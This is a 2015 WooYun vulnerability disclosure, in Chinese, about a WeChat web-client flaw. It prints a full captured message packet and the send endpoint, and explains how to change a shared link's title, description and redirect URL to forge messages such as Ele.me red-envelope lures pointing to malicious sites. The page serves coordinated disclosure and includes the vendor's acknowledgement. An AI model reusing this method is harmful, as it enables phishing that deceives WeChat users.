当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158906

漏洞标题:微信网页版链接分享漏洞(比如伪造饿了么红包消息钓鱼)

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2015-12-07 11:13

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

利用微信web端,修改图文链接消息(比如饿了么红包消息),然后发送出去,经测试,可以修改的有标题,摘要,跳转链接,比如把跳转链接改成某个木马网站,用户还以为是正常红包,点进去之后就GG了

详细说明:

首先登录https://wx.qq.com/ 浏览器F12抓包 用手机给自己发个图文链接消息(比如饿了么红包)得到这样一个消息包

1.jpg


整理一下,组装成要发送的封包

{"BaseRequest":{"Uin":716107972,"Sid":"SebkHMNCgz8nhpLX","Skey":"@crypt_5e1cf903_8486b15f0d6e617b2dcbc14a634158ea","DeviceID":"e881369842914864"},"Msg":{"Type":5,"Content":"<appmsg appid='wx3fea7a3c94a23944' sdkver='0'><title>领取饿了么红包,看饿了别叫妈,和王祖蓝一起走火入魔</title><des>每周日0点爱奇艺,百变神咖-王祖蓝,魔性上演</des><action></action><showtype>0</showtype><mediatagname></mediatagname><messageext></messageext><messageaction></messageaction><content></content><url>https://m.ele.me/activities/hongbao?hardware_id=3fca613450f7e9a7bdc7d590e4f2ff8f&amp;track_id=1442566941%7C_f85c6d24-5de3-11e5-b23a-c81f66fb98a9%7Cbd6b3eda48770a593bf2a444d486215b&amp;d18:20 2015/12/6 星期日vice_id=b325dc11-26e0-3c79-a918-955dc85b7b34&amp;sn=28cf845bf9a08aa4addc2044d9944866</url><lowurl></lowurl><dataurl></dataurl><lowdataurl></lowdataurl><appattach><totallen>0</totallen><attachid></attachid><emoticonmd5></emoticonmd5><fileext></fileext><cdnthumburl>30590201000452305002010002046d42c1c002030f424302041ff690750204566408a1042e6175706170706d73675f653831313963356364376633353464655f313434393333353932383332325f33313730350201000201000400</cdnthumburl><cdnthumblength>17478</cdnthumblength><cdnthumbwidth>100</cdnthumbwidth><cdnthumbheight>200</cdnthumbheight><cdnthumbaeskey>39333861323861363666626436616431</cdnthumbaeskey><aeskey>39333861323861363666626436616431</aeskey><encryver>0</encryver></appattach><extinfo></extinfo><commenturl></commenturl><thumburl></thumburl><md5></md5></appmsg>","FromUserName":"@db55c0055d9d6319205f8bf6bf63f721ff59fd4e3bae8a87839d0d324a71de0d","ToUserName":"@@d4b99dabd29f735a46cfd5657bbfec4b0aa3e486bd9bf1b7bd0a142be3a13fbe","LocalID":"14493964037650761","ClientMsgId":"14493964037650761"}}


提交的地址

https://wx.qq.com/cgi-bin/mmwebwx-bin/webwxsendappmsg?fun=async&f=json


最后附上登录时获取的Cookies发送POST请求
返回

{
"BaseResponse": {
"Ret": 0,
"ErrMsg": ""
}
,
"MsgID": "2878317252114451231",
"LocalID": "14494045349370329"
}


发送成功
简单做了一个小程序

2.jpg


3.jpg


4.jpg


再来看微信收到的消息,瞬间被玩坏。。。
从上到下4条消息
第一条:正常红包
第二条:修改了跳转URL
第三条:修改了文字描述
第四条:修改了AppID

Screenshot_2015-12-06-20-09-34.png


Screenshot_2015-12-06-20-15-07.png


漏洞证明:

javascript:void(0)

修复方案:

不知道~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-12-07 21:34

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无